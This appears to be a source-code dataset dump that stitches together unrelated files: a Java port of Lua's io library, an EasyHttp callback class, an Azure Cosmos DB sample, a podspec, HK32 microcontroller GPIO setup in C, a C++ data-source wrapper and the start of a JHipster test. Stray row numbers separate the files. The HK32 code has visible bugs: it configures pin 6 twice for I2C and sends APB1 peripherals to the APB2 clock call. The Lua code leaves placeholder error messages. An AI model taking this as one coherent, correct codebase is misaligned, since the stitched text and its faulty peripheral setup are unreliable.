FileStruct f = ( FileStruct ) LuaAPI.luaL_checkudata ( thread, 1, LuaAPI.LUA_FILEHANDLE );
if ( f == null || f.isClosed == true )
LuaAPI.luaL_error ( thread, "attempt to use a closed file" );
return f;
}
public static final class io_readline implements JavaFunction {
public int Call ( lua_State thread ) {
FileStruct f = ( FileStruct ) LuaAPI.lua_touserdata ( thread, LuaAPI.lua_upvalueindex ( 1 ) );
int sucess;
if ( f == null || f.isClosed == true ) /* file is already closed? */
LuaAPI.luaL_error ( thread, "file is already closed" );
sucess = read_line ( thread, f );
if ( sucess == 1 )
return 1;
else /* EOF */ {
if ( LuaAPI.lua_toboolean ( thread, LuaAPI.lua_upvalueindex ( 2 ) ) ) /* generator created file? */ {
LuaAPI.lua_settop ( thread, 0 );
LuaAPI.lua_pushvalue ( thread, LuaAPI.lua_upvalueindex ( 1 ) );
aux_close ( thread ); /* close it */
}
return 0;
}
}
}
public static final class io_close implements JavaFunction {
public int Call ( lua_State thread ) {
if ( LuaAPI.lua_gettop ( thread ) < 2 )
LuaAPI.lua_rawgeti ( thread, LuaAPI.LUA_ENVIRONINDEX, IO_OUTPUT );
tofile ( thread ); /* make sure argument is a file */
return aux_close ( thread );
}
}
public static final class io_gc implements JavaFunction {
public int Call ( lua_State thread ) {
FileStruct f = ( FileStruct ) LuaAPI.luaL_checkudata ( thread, 1, LuaAPI.LUA_FILEHANDLE );
/* ignore closed files */
if ( f != null )
aux_close ( thread );
return 0;
}
}
public static final class io_tostring implements JavaFunction {
public int Call ( lua_State thread ) {
FileStruct f = ( FileStruct ) LuaAPI.luaL_checkudata ( thread, 1, LuaAPI.LUA_FILEHANDLE );
if ( f == null || f.isClosed == true )
LuaAPI.lua_pushliteral ( thread, "file (closed)" );
else
LuaAPI.lua_pushfstring ( thread, "file (" + f.toString () + ")" );
return 1;
}
}
public static final class io_open implements JavaFunction {
public int Call ( lua_State thread ) {
String filename = LuaAPI.luaL_checkstring ( thread, 1 );
String mode = LuaAPI.luaL_optstring ( thread, 2, "r" );
FileStruct pf = newfile ( thread );
pf = fopen ( pf, filename, mode );
return ( pf == null ) ? pushresult ( thread, 0, filename ) : 1;
}
}
/*
** this function has a separated environment, which defines the
** correct __close for 'popen' files
*/
public static final class io_popen implements JavaFunction {
public int Call ( lua_State thread ) {
LuaAPI.luaL_error ( thread, "Not implemented yet" );
return -1;
/* String filename = LuaAPI.luaL_checkstring(thread, 1);
String mode = LuaAPI.luaL_optstring(thread, 2, "r");
FileStruct pf = newfile(thread);
//pf = lua_popen(thread, filename, mode);
return (pf == null) ? pushresult(thread, 0, filename) : 1;
*/
}
}
public static final class io_tmpfile implements JavaFunction {
public int Call ( lua_State thread ) {
FileStruct pf = newfile ( thread );
pf = tmpfile ( thread, pf );
return ( pf == null ) ? pushresult ( thread, 0, null ) : 1;
}
}
public static final class io_fclose implements JavaFunction {
public int Call ( lua_State thread ) {
FileStruct p = ( FileStruct ) LuaAPI.luaL_checkudata ( thread, 1, LuaAPI.LUA_FILEHANDLE );
int ok = p.fclose () == 0 ? 1 : 0;
p = null;
return pushresult ( thread, ok, null );
}
}
public static final class io_noclose implements JavaFunction {
public int Call ( lua_State thread ) {
LuaAPI.lua_pushnil ( thread );
LuaAPI.lua_pushliteral ( thread, "cannot close standard file" );
return 2;
}
}
public static final class io_pclose implements JavaFunction {
public int Call ( lua_State thread ) {
LuaAPI.luaL_error ( thread, "Not implemented yet" );
return -1;
/* FileStruct p = (FileStruct)LuaAPI.luaL_checkudata(thread, 1, LuaAPI.LUA_FILEHANDLE);
int ok = 0;//lua_pclose(thread, p);
p = null;
return pushresult(thread, ok, null);
*/
}
}
public static final class f_lines implements JavaFunction {
public int Call ( lua_State thread ) {
tofile ( thread ); /* check that it's a valid file handle */
aux_lines ( thread, 1, 0 );
return 1;
}
}
static void aux_lines ( lua_State thread, int idx, int toclose ) {
LuaAPI.lua_pushvalue ( thread, idx );
boolean res;
if ( toclose == 1 )
res = true;
else
res = false;
LuaAPI.lua_pushboolean ( thread, res ); /* close/not close file when finished */
LuaAPI.lua_pushjavafunction ( thread, new io_readline (), 2 );
}
public static final class io_lines implements JavaFunction {
public int Call ( lua_State thread ) {
if ( LuaAPI.lua_isnoneornil ( thread, 1 ) ) /* no arguments? */ {
/* will iterate over default input */
LuaAPI.lua_rawgeti ( thread, LuaAPI.LUA_ENVIRONINDEX, IO_INPUT );
return new f_lines ().Call ( thread );
}
else {
String filename = LuaAPI.luaL_checkstring ( thread, 1 );
FileStruct pf = newfile ( thread );
pf = fopen ( pf, filename, "r" );
if ( pf == null )
fileerror ( thread, 1, filename );
aux_lines ( thread, LuaAPI.lua_gettop ( thread ), 1 );
return 1;
}
}
}
static int pushresult ( lua_State thread, int i, String filename ) {
int en = 0;//errno; /* calls to Lua API may change this value */
if ( i != 0 ) {
LuaAPI.lua_pushboolean ( thread, true );
return 1;
}
else {
LuaAPI.lua_pushnil ( thread );
if ( filename != null )
LuaAPI.lua_pushfstring ( thread, filename + ": " + "error"/*FIXME: error msg must be correct "%s: %s", filename, strerror(en)*/ );
else
LuaAPI.lua_pushfstring ( thread, "error"/*FIXME: error msg must be correct "%s", strerror(en)*/ );
LuaAPI.lua_pushinteger ( thread, en );
return 3;
}
}
static void fileerror ( lua_State thread, int arg, String filename ) {
LuaAPI.lua_pushfstring ( thread, filename + ":" + "error"/*FIXME: error string must be correct "%s: %s", filename, strerror(errno)*/ );
LuaAPI.luaL_argerror ( thread, arg, LuaAPI.lua_tostring ( thread, -1 ) );
}
public static final class io_type implements JavaFunction {
public int Call ( lua_State thread ) {
Object ud = null;
LuaAPI.luaL_checkany ( thread, 1 );
ud = LuaAPI.lua_touserdata ( thread, 1 );
LuaAPI.lua_getfield ( thread, LuaAPI.LUA_REGISTRYINDEX, LuaAPI.LUA_FILEHANDLE );
if ( ud == null || ! LuaAPI.lua_getmetatable ( thread, 1 ) || ! LuaAPI.lua_rawequal ( thread, -2, -1 ) )
LuaAPI.lua_pushnil ( thread ); /* not a file */
else if ( ( ( FileStruct ) ud ).isClosed == true )
LuaAPI.lua_pushliteral ( thread, "closed file" );
else
LuaAPI.lua_pushliteral ( thread, "file" );
return 1;
}
}
static FileStruct newfile ( lua_State thread ) {
FileStruct pf = ( FileStruct ) LuaAPI.lua_newuserdata ( thread, new FileStruct (), 0 );
LuaAPI.luaL_getmetatable ( thread, LuaAPI.LUA_FILEHANDLE );
LuaAPI.lua_setmetatable ( thread, -2 );
return pf;
}
static FileStruct newfile ( lua_State thread, FileStruct file ) {
file = ( FileStruct ) LuaAPI.lua_newuserdata ( thread, file, 0 );
LuaAPI.luaL_getmetatable ( thread, LuaAPI.LUA_FILEHANDLE );
LuaAPI.lua_setmetatable ( thread, -2 );
return file;
}
static int aux_close ( lua_State thread ) {
LuaAPI.lua_getfenv ( thread, 1 );
LuaAPI.lua_getfield ( thread, -1, "__close" );
return LuaAPI.lua_tojavafunction ( thread, -1 ).Call ( thread );
}
public static final class f_setvbuf implements JavaFunction {
public int Call ( lua_State thread ) {
final int[] mode = { _IONBF, _IOFBF, _IOLBF };
final String[] modenames = { "no", "full", "line" };
FileStruct f = tofile ( thread );
int op = LuaAPI.luaL_checkoption ( thread, 2, null, modenames );
int sz = LuaAPI.luaL_optinteger ( thread, 3, LuaAPI.LUAL_BUFFERSIZE );
int res = f.setvbuf ( mode[op], sz );
int res2 = 0;
if ( res == 0 )
res2 = 1;
return pushresult ( thread, res2, null );
}
}
static void createmeta ( lua_State thread ) {
luaL_Reg[] luaReg = new luaL_Reg[] {
new luaL_Reg ( "close", new io_close () ),
new luaL_Reg ( "flush", new f_flush () ),
new luaL_Reg ( "lines", new f_lines () ),
new luaL_Reg ( "read", new f_read () ),
new luaL_Reg ( "seek", new f_seek () ),
new luaL_Reg ( "setvbuf", new f_setvbuf () ),
new luaL_Reg ( "write", new f_write () ),
new luaL_Reg ( "__gc", new io_gc () ),
new luaL_Reg ( "__tostring", new io_tostring () ),
};
LuaAPI.luaL_newmetatable ( thread, LuaAPI.LUA_FILEHANDLE ); /* create metatable for file handles */
LuaAPI.lua_pushvalue ( thread, -1 ); /* push metatable */
LuaAPI.lua_setfield ( thread, -2, "__index" ); /* metatable.__index = metatable */
LuaAPI.luaL_register ( thread, null, luaReg );
}
static void createstdfile ( lua_State thread, FileStruct f, int k, String fname ) {
newfile ( thread, f );
if ( k > 0 ) {
LuaAPI.lua_pushvalue ( thread, -1 );
LuaAPI.lua_rawseti ( thread, LuaAPI.LUA_ENVIRONINDEX, k );
}
LuaAPI.lua_pushvalue ( thread, -2 ); /* copy environment */
LuaAPI.lua_setfenv ( thread, -2 ); /* set it */
LuaAPI.lua_setfield ( thread, -3, fname );
}
static void newfenv ( lua_State thread, JavaFunction cls ) {
LuaAPI.lua_createtable ( thread, 0, 1 );
LuaAPI.lua_pushjavafunction ( thread, cls );
LuaAPI.lua_setfield ( thread, -2, "__close" );
}
public static final class luaopen_io implements JavaFunction {
public int Call ( lua_State thread ) {
createmeta ( thread );
luaL_Reg[] luaReg = new luaL_Reg[] {
new luaL_Reg ( "close", new io_close () ),
new luaL_Reg ( "flush", new io_flush () ),
new luaL_Reg ( "input", new io_input () ),
new luaL_Reg ( "lines", new io_lines () ),
new luaL_Reg ( "open", new io_open () ),
new luaL_Reg ( "output", new io_output () ),
new luaL_Reg ( "popen", new io_popen () ),
new luaL_Reg ( "read", new io_read () ),
new luaL_Reg ( "tmpfile", new io_tmpfile () ),
new luaL_Reg ( "type", new io_type () ),
new luaL_Reg ( "write", new io_write () ),
};
/* create (private) environment (with fields IO_INPUT, IO_OUTPUT, __close) */
newfenv ( thread, new io_fclose () );
LuaAPI.lua_replace ( thread, LuaAPI.LUA_ENVIRONINDEX );
/* open library */
LuaAPI.luaL_register ( thread, LUA_IOLIBNAME, luaReg );
/* create (and set) default files */
newfenv ( thread, new io_noclose () ); /* close function for default files */
createstdfile ( thread, new FileStruct (), IO_INPUT, "stdin" );
createstdfile ( thread, new FileStruct (), IO_OUTPUT, "stdout" );
createstdfile ( thread, new FileStruct (), 0, "stderr" );
LuaAPI.lua_pop ( thread, 1 ); /* pop environment for default files */
LuaAPI.lua_getfield ( thread, -1, "popen" );
newfenv ( thread, new io_pclose () ); /* create environment for 'popen' */
LuaAPI.lua_setfenv ( thread, -2 ); /* set fenv for 'popen' */
LuaAPI.lua_pop ( thread, 1 ); /* pop 'popen' */
return 1;
}
}
public int Call ( lua_State thread ) {
return 0;
}
}
| 31,271 |
817 | <gh_stars>100-1000
package com.hjq.http.callback;
import com.hjq.http.EasyLog;
import com.hjq.http.EasyUtils;
import com.hjq.http.lifecycle.HttpLifecycleManager;
import com.hjq.http.listener.OnHttpListener;
import com.hjq.http.model.CacheMode;
import com.hjq.http.request.BaseRequest;
import java.io.IOException;
import okhttp3.Call;
import okhttp3.Response;
/**
* author : <NAME>
* github : https://github.com/getActivity/EasyHttp
* time : 2019/11/25
* desc : 正常接口回调
*/
@SuppressWarnings({"rawtypes", "unchecked"})
public final class NormalCallback extends BaseCallback {
/** 请求配置 */
private final BaseRequest mBaseRequest;
/** 接口回调 */
private OnHttpListener mListener;
public NormalCallback(BaseRequest request) {
super(request);
mBaseRequest = request;
}
public NormalCallback setListener(OnHttpListener listener) {
mListener = listener;
return this;
}
@Override
public void start() {
CacheMode cacheMode = mBaseRequest.getRequestCache().getMode();
if (cacheMode != CacheMode.USE_CACHE_ONLY && cacheMode != CacheMode.USE_CACHE_FIRST) {
super.start();
return;
}
try {
Object result = mBaseRequest.getRequestHandler().readCache(mBaseRequest.getLifecycleOwner(),
mBaseRequest.getRequestApi(), EasyUtils.getReflectType(mListener));
EasyLog.print("ReadCache result:" + result);
// 如果没有缓存,就请求网络
if (result == null) {
super.start();
return;
}
// 读取缓存成功
EasyUtils.post(() -> {
if (mListener == null || !HttpLifecycleManager.isLifecycleActive(mBaseRequest.getLifecycleOwner())) {
return;
}
mListener.onStart(getCall());
mListener.onSucceed(result, true);
mListener.onEnd(getCall());
});
// 如果当前模式是先读缓存再写请求
if (cacheMode == CacheMode.USE_CACHE_FIRST) {
EasyUtils.postDelayed(() -> {
if (!HttpLifecycleManager.isLifecycleActive(mBaseRequest.getLifecycleOwner())) {
return;
}
// 将回调置为空,避免出现两次回调
mListener = null;
super.start();
}, 1);
}
} catch (Throwable throwable) {
EasyLog.print("ReadCache error");
EasyLog.print(throwable);
super.start();
}
}
@Override
protected void onStart(Call call) {
EasyUtils.post(() -> {
if (mListener == null || !HttpLifecycleManager.isLifecycleActive(mBaseRequest.getLifecycleOwner())) {
return;
}
mListener.onStart(call);
});
}
@Override
protected void onResponse(Response response) throws Exception {
// 打印请求耗时时间
EasyLog.print("RequestConsuming:" +
(response.receivedResponseAtMillis() - response.sentRequestAtMillis()) + " ms");
// 解析 Bean 类对象
final Object result = mBaseRequest.getRequestHandler().requestSucceed(
mBaseRequest.getLifecycleOwner(), mBaseRequest.getRequestApi(),
response, EasyUtils.getReflectType(mListener));
CacheMode cacheMode = mBaseRequest.getRequestCache().getMode();
if (cacheMode == CacheMode.USE_CACHE_ONLY || cacheMode == CacheMode.USE_CACHE_FIRST) {
try {
boolean writeSucceed = mBaseRequest.getRequestHandler().writeCache(mBaseRequest.getLifecycleOwner(),
mBaseRequest.getRequestApi(), response, result);
EasyLog.print("WriteCache result:" + writeSucceed);
} catch (Throwable throwable) {
EasyLog.print("WriteCache error");
EasyLog.print(throwable);
}
}
EasyUtils.post(() -> {
if (mListener == null || !HttpLifecycleManager.isLifecycleActive(mBaseRequest.getLifecycleOwner())) {
return;
}
mListener.onSucceed(result, false);
mListener.onEnd(getCall());
});
}
@Override
protected void onFailure(Exception e) {
// 如果设置了只在网络请求失败才去读缓存
if (e instanceof IOException && mBaseRequest.getRequestCache().getMode() == CacheMode.USE_CACHE_AFTER_FAILURE) {
try {
Object result = mBaseRequest.getRequestHandler().readCache(mBaseRequest.getLifecycleOwner(),
mBaseRequest.getRequestApi(), EasyUtils.getReflectType(mListener));
EasyLog.print("ReadCache result:" + result);
if (result != null) {
EasyUtils.post(() -> {
if (mListener == null || !HttpLifecycleManager.isLifecycleActive(mBaseRequest.getLifecycleOwner())) {
return;
}
mListener.onSucceed(result, true);
mListener.onEnd(getCall());
});
return;
}
} catch (Throwable throwable) {
EasyLog.print("ReadCache error");
EasyLog.print(throwable);
}
}
final Exception exception = mBaseRequest.getRequestHandler().requestFail(
mBaseRequest.getLifecycleOwner(), mBaseRequest.getRequestApi(), e);
// 打印错误堆栈
EasyLog.print(exception);
EasyUtils.post(() -> {
if (mListener == null || !HttpLifecycleManager.isLifecycleActive(mBaseRequest.getLifecycleOwner())) {
return;
}
mListener.onFail(exception);
mListener.onEnd(getCall());
});
}
} | 3,068 |
1,350 | <reponame>billwert/azure-sdk-for-java
// Copyright (c) Microsoft Corporation. All rights reserved.
// Licensed under the MIT License.
// Code generated by Microsoft (R) AutoRest Code Generator.
package com.azure.resourcemanager.cosmos.generated;
import com.azure.core.util.Context;
import com.azure.resourcemanager.cosmos.models.FailoverPolicies;
import com.azure.resourcemanager.cosmos.models.FailoverPolicy;
import java.util.Arrays;
/** Samples for DatabaseAccounts FailoverPriorityChange. */
public final class DatabaseAccountsFailoverPriorityChangeSamples {
/*
* x-ms-original-file: specification/cosmos-db/resource-manager/Microsoft.DocumentDB/stable/2021-10-15/examples/CosmosDBDatabaseAccountFailoverPriorityChange.json
*/
/**
* Sample code: CosmosDBDatabaseAccountFailoverPriorityChange.
*
* @param azure The entry point for accessing resource management APIs in Azure.
*/
public static void cosmosDBDatabaseAccountFailoverPriorityChange(
com.azure.resourcemanager.AzureResourceManager azure) {
azure
.cosmosDBAccounts()
.manager()
.serviceClient()
.getDatabaseAccounts()
.failoverPriorityChange(
"rg1",
"ddb1-failover",
new FailoverPolicies()
.withFailoverPolicies(
Arrays
.asList(
new FailoverPolicy().withLocationName("eastus").withFailoverPriority(0),
new FailoverPolicy().withLocationName("westus").withFailoverPriority(1))),
Context.NONE);
}
}
| 712 |
5,169 | {
"name": "RoundCornerView",
"version": "0.1.0",
"summary": "Round the view that is being passed",
"description": "\"TODO: Add long description of the pod here.\"",
"homepage": "https://github.com/waqar1992/RoundedCornerView",
"license": {
"type": "MIT",
"file": "LICENSE"
},
"authors": {
"waqar.ahmed": "<EMAIL>"
},
"source": {
"git": "https://github.com/waqar1992/RoundedCornerView.git",
"commit": "<PASSWORD>"
},
"platforms": {
"ios": "9.0"
},
"swift_version": "4.2",
"source_files": "RoundCornerView/Classes/**/*",
"frameworks": "UIKit"
}
| 253 |
7,482 | /*
* Copyright (c) 2006-2018, RT-Thread Development Team
*
* SPDX-License-Identifier: Apache-2.0
*
* Change Logs:
* Date Author Notes
* 2021-08-14 Jonas first version
*/
#include <hk32f0xx.h>
#include <rtthread.h>
#include "hk32_msp.h"
#ifdef BSP_USING_UART
void hk32_msp_usart_init(void *Instance)
{
GPIO_InitTypeDef GPIO_InitStruct;
USART_TypeDef *USARTx = (USART_TypeDef *)Instance;
GPIO_StructInit(&GPIO_InitStruct);
GPIO_InitStruct.GPIO_Speed = GPIO_Speed_50MHz;
#ifdef BSP_USING_UART1
if (USART1 == USARTx)
{
#define USART1_REMAP
#ifndef USART1_REMAP
RCC_APB2PeriphClockCmd(RCC_APB2Periph_USART1, ENABLE);
RCC_AHBPeriphClockCmd(RCC_AHBPeriph_GPIOA, ENABLE);
GPIO_InitStruct.GPIO_OType = GPIO_OType_PP;
GPIO_InitStruct.GPIO_Mode = GPIO_Mode_AF;
GPIO_InitStruct.GPIO_Pin = GPIO_Pin_9;
GPIO_Init(GPIOA, &GPIO_InitStruct);
GPIO_InitStruct.GPIO_Mode = GPIO_Mode_AF;
GPIO_InitStruct.GPIO_OType = GPIO_OType_PP;
GPIO_InitStruct.GPIO_PuPd = GPIO_PuPd_UP;
GPIO_InitStruct.GPIO_Pin = GPIO_Pin_10;
GPIO_Init(GPIOA, &GPIO_InitStruct);
GPIO_PinAFConfig(GPIOA, GPIO_PinSource9, GPIO_AF_1);
GPIO_PinAFConfig(GPIOA, GPIO_PinSource10, GPIO_AF_1);
#else
RCC_APB2PeriphClockCmd(RCC_APB2Periph_USART1, ENABLE);
RCC_AHBPeriphClockCmd(RCC_AHBPeriph_GPIOB, ENABLE);
GPIO_InitStruct.GPIO_OType = GPIO_OType_PP;
GPIO_InitStruct.GPIO_Mode = GPIO_Mode_AF;
GPIO_InitStruct.GPIO_Pin = GPIO_Pin_6;
GPIO_Init(GPIOB, &GPIO_InitStruct);
GPIO_InitStruct.GPIO_Mode = GPIO_Mode_AF;
GPIO_InitStruct.GPIO_OType = GPIO_OType_PP;
GPIO_InitStruct.GPIO_PuPd = GPIO_PuPd_UP;
GPIO_InitStruct.GPIO_Pin = GPIO_Pin_7;
GPIO_Init(GPIOB, &GPIO_InitStruct);
GPIO_PinAFConfig(GPIOB, GPIO_PinSource6, GPIO_AF_0);
GPIO_PinAFConfig(GPIOB, GPIO_PinSource7, GPIO_AF_0);
#endif
}
#endif
#ifdef BSP_USING_UART2
if (USART2 == USARTx)
{
RCC_APB2PeriphClockCmd(RCC_APB1Periph_USART2, ENABLE);
RCC_AHBPeriphClockCmd(RCC_AHBPeriph_GPIOA, ENABLE);
GPIO_InitStruct.GPIO_OType = GPIO_OType_PP;
GPIO_InitStruct.GPIO_Mode = GPIO_Mode_AF;
GPIO_InitStruct.GPIO_Pin = GPIO_Pin_2;
GPIO_Init(GPIOA, &GPIO_InitStruct);
GPIO_InitStruct.GPIO_Mode = GPIO_Mode_AF;
GPIO_InitStruct.GPIO_OType = GPIO_OType_PP;
GPIO_InitStruct.GPIO_PuPd = GPIO_PuPd_UP;
GPIO_InitStruct.GPIO_Pin = GPIO_Pin_3;
GPIO_Init(GPIOA, &GPIO_InitStruct);
GPIO_PinAFConfig(GPIOA, GPIO_PinSource2, GPIO_AF_1);
GPIO_PinAFConfig(GPIOA, GPIO_PinSource3, GPIO_AF_1);
}
#endif
/* Add others */
}
#endif /* BSP_USING_SERIAL */
#ifdef BSP_USING_I2C
void hk32_msp_i2c_init(void *Instance)
{
GPIO_InitTypeDef GPIO_InitStruct;
I2C_TypeDef *I2Cx = (I2C_TypeDef *)Instance;
GPIO_StructInit(&GPIO_InitStruct);
GPIO_InitStruct.GPIO_Speed = GPIO_Speed_50MHz;
#ifdef BSP_USING_I2C1
if (I2C1 == I2Cx)
{
#ifndef I2C1_REMAP
RCC_APB1PeriphClockCmd(RCC_APB1Periph_I2C1, ENABLE);
RCC_AHBPeriphClockCmd(RCC_AHBPeriph_GPIOB, ENABLE);
GPIO_InitStruct.GPIO_OType = GPIO_OType_PP;
GPIO_InitStruct.GPIO_Mode = GPIO_Mode_AF;
GPIO_InitStruct.GPIO_Pin = GPIO_Pin_6;
GPIO_Init(GPIOB, &GPIO_InitStruct);
GPIO_InitStruct.GPIO_Mode = GPIO_Mode_AF;
GPIO_InitStruct.GPIO_OType = GPIO_OType_PP;
GPIO_InitStruct.GPIO_PuPd = GPIO_PuPd_UP;
GPIO_InitStruct.GPIO_Pin = GPIO_Pin_6;
GPIO_Init(GPIOB, &GPIO_InitStruct);
GPIO_PinAFConfig(GPIOB, GPIO_PinSource6, GPIO_AF_1);
GPIO_PinAFConfig(GPIOB, GPIO_PinSource7, GPIO_AF_1);
#else
RCC_APB2PeriphClockCmd(RCC_APB1Periph_I2C1, ENABLE);
RCC_AHBPeriphClockCmd(RCC_AHBPeriph_GPIOB, ENABLE);
GPIO_InitStruct.GPIO_OType = GPIO_OType_PP;
GPIO_InitStruct.GPIO_Mode = GPIO_Mode_AF;
GPIO_InitStruct.GPIO_PuPd = GPIO_PuPd_UP;
GPIO_InitStruct.GPIO_Pin = GPIO_Pin_8;
GPIO_Init(GPIOB, &GPIO_InitStruct);
GPIO_InitStruct.GPIO_Mode = GPIO_Mode_AF;
GPIO_InitStruct.GPIO_OType = GPIO_OType_PP;
GPIO_InitStruct.GPIO_PuPd = GPIO_PuPd_UP;
GPIO_InitStruct.GPIO_Pin = GPIO_Pin_9;
GPIO_Init(GPIOB, &GPIO_InitStruct);
GPIO_PinAFConfig(GPIOB, GPIO_PinSource8, GPIO_AF_1);
GPIO_PinAFConfig(GPIOB, GPIO_PinSource9, GPIO_AF_1);
#endif
}
#endif
/* Add others */
}
#endif /* BSP_USING_I2C */
#ifdef BSP_USING_SPI
void hk32_msp_spi_init(void *Instance)
{
GPIO_InitTypeDef GPIO_InitStruct;
SPI_TypeDef *SPIx = (SPI_TypeDef *)Instance;
GPIO_StructInit(&GPIO_InitStruct);
GPIO_InitStruct.GPIO_Speed = GPIO_Speed_50MHz;
#ifdef BSP_USING_SPI1
if (SPI1 == SPIx)
{
#ifndef SPI1_REMAP
RCC_APB2PeriphClockCmd(RCC_APB2Periph_SPI1, ENABLE);
RCC_AHBPeriphClockCmd(RCC_AHBPeriph_GPIOA, ENABLE);
GPIO_InitStruct.GPIO_OType = GPIO_OType_PP;
GPIO_InitStruct.GPIO_Mode = GPIO_Mode_OUT;
GPIO_InitStruct.GPIO_Pin = GPIO_Pin_4;
GPIO_Init(GPIOA, &GPIO_InitStruct);
GPIO_InitStruct.GPIO_Mode = GPIO_Mode_AF;
GPIO_InitStruct.GPIO_OType = GPIO_OType_PP;
GPIO_InitStruct.GPIO_PuPd = GPIO_PuPd_UP;
GPIO_InitStruct.GPIO_Pin = GPIO_Pin_5 | GPIO_Pin_6 | GPIO_Pin_7;
GPIO_Init(GPIOA, &GPIO_InitStruct);
GPIO_PinAFConfig(GPIOA, GPIO_PinSource5, GPIO_AF_0);
GPIO_PinAFConfig(GPIOA, GPIO_PinSource6, GPIO_AF_0);
GPIO_PinAFConfig(GPIOA, GPIO_PinSource7, GPIO_AF_0);
#else
RCC_APB2PeriphClockCmd(RCC_APB2Periph_SPI1, ENABLE);
RCC_AHBPeriphClockCmd(RCC_AHBPeriph_GPIOB, ENABLE);
RCC_AHBPeriphClockCmd(RCC_AHBPeriph_GPIOA, ENABLE);
GPIO_InitStruct.GPIO_OType = GPIO_OType_PP;
GPIO_InitStruct.GPIO_Mode = GPIO_Mode_OUT;
GPIO_InitStruct.GPIO_Pin = GPIO_Pin_15;
GPIO_Init(GPIOA, &GPIO_InitStruct);
GPIO_InitStruct.GPIO_Mode = GPIO_Mode_AF;
GPIO_InitStruct.GPIO_OType = GPIO_OType_PP;
GPIO_InitStruct.GPIO_PuPd = GPIO_PuPd_UP;
GPIO_InitStruct.GPIO_Pin = GPIO_Pin_3 | GPIO_Pin_4 | GPIO_Pin_5;
GPIO_Init(GPIOB, &GPIO_InitStruct);
GPIO_PinAFConfig(GPIOB, GPIO_PinSource3, GPIO_AF_0);
GPIO_PinAFConfig(GPIOB, GPIO_PinSource4, GPIO_AF_0);
GPIO_PinAFConfig(GPIOB, GPIO_PinSource5, GPIO_AF_0);
#endif
}
#endif
/* Add others */
}
#endif /* BSP_USING_I2C */
| 3,365 |
332 | <gh_stars>100-1000
/*
* Copyright 2002-2013 the original author or authors.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.springframework.xd.store;
import java.io.Serializable;
import org.springframework.data.repository.PagingAndSortingRepository;
/**
* Implemented by XD repositories, exists mainly as a mean to capture several interfaces into one.
*
* @author <NAME>
*/
public interface DomainRepository<T, ID extends Serializable & Comparable<ID>> extends
PagingAndSortingRepository<T, ID>, RangeCapableRepository<T, ID> {
}
| 292 |
1,062 | <gh_stars>1000+
/**
* Copyright 2014 Google Inc. All rights reserved.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
#include <string>
#include <iostream>
#include <stdexcept>
#include "external/external_api.h"
namespace MR4C {
class ExternalDataFileSourceImpl : public DataFileSource {
friend class ExternalDataFileSource;
private:
bool m_released;
CExternalDataSourceCallbacks m_callbacks;
ExternalDataFileSourceImpl(const CExternalDataSourceCallbacks& callbacks) {
m_released = false;
m_callbacks = callbacks;
}
char* getFileBytes() const {
assertNotReleased();
char* bytes = m_callbacks.getBytesCallback();
if ( bytes==NULL ) {
throw std::runtime_error("GetBytes callback failed");
}
return bytes;
}
size_t getFileSize() const {
assertNotReleased();
size_t size;
bool success = m_callbacks.getSizeCallback(&size);
if ( !success ) {
throw std::runtime_error("GetFileSize callback failed");
}
return size;
}
size_t read(char* buf, size_t num) {
assertNotReleased();
size_t numRead;
bool success = m_callbacks.readCallback(buf, num, &numRead);
if ( !success ) {
throw std::runtime_error("Read callback failed");
}
return numRead;
}
size_t skip(size_t num) {
assertNotReleased();
size_t numSkipped;
bool success = m_callbacks.skipCallback(num, &numSkipped);
if ( !success ) {
throw std::runtime_error("Skip callback failed");
}
return numSkipped;
}
void release() {
if ( !m_released ) {
m_callbacks.releaseCallback();
// allowing file to be released and then re-accessed if permitted on the Java side
//m_released = true;
}
}
bool isReleased() const {
return m_released;
}
void assertNotReleased() const {
if ( m_released ) {
throw std::logic_error("Data source already released");
}
}
public:
~ExternalDataFileSourceImpl() {
}
};
ExternalDataFileSource::ExternalDataFileSource(const CExternalDataSourceCallbacks& callbacks) {
m_impl = std::shared_ptr<DataFileSource>(new ExternalDataFileSourceImpl(callbacks));
}
ExternalDataFileSource::ExternalDataFileSource(std::shared_ptr<DataFileSource> src) {
m_impl = src;
}
std::shared_ptr<DataFileSource> ExternalDataFileSource::getFileSource() const {
return m_impl;
}
const char* ExternalDataFileSource::getBytes() const {
return m_impl->getFileBytes();
}
size_t ExternalDataFileSource::getSize() const {
return m_impl->getFileSize();
}
ExternalDataFileSource::~ExternalDataFileSource() {
}
}
| 1,055 |
1,275 | <gh_stars>1000+
package io.github.jhipster.sample.web.rest;
import static io.github.jhipster.sample.web.rest.AccountResourceIT.TEST_USER_LOGIN;
import static org.assertj.core.api.Assertions.assertThat;
import static org.springframework.test.web.servlet.request.MockMvcRequestBuilders.*;
import static org.springframework.test.web.servlet.result.MockMvcResultMatchers.*;
import io.github.jhipster.sample.IntegrationTest;
import io.github.jhipster.sample.config.Constants;
import io.github.jhipster.sample.domain.User;
import io.github.jhipster.sample.repository.AuthorityRepository;
import io.github.jhipster.sample.repository.UserRepository;
import io.github.jhipster.sample.security.AuthoritiesConstants;
import io.github.jhipster.sample.service.UserService;
import io.github.jhipster.sample.service.dto.AdminUserDTO;
import io.github.jhipster.sample.service.dto.PasswordChangeDTO;
import io.github.jhipster.sample.service.dto.UserDTO;
import io.github.jhipster.sample.web.rest.vm.KeyAndPasswordVM;
import io.github.jhipster.sample.web.rest.vm.ManagedUserVM;
import java.time.Instant;
import java.util.*;
import org.apache.commons.lang3.RandomStringUtils;
import org.junit.jupiter.api.Test;
import org.springframework.beans.factory.annotation.Autowired;
import org.springframework.boot.test.autoconfigure.web.servlet.AutoConfigureMockMvc;
import org.springframework.http.MediaType;
import org.springframework.security.crypto.password.PasswordEncoder;
import org.springframework.security.test.context.support.WithMockUser;
import org.springframework.test.web.servlet.MockMvc;
import org.springframework.transaction.annotation.Transactional;
/**
* Integration tests for the {@link AccountResource} REST controller.
*/
@AutoConfigureMockMvc
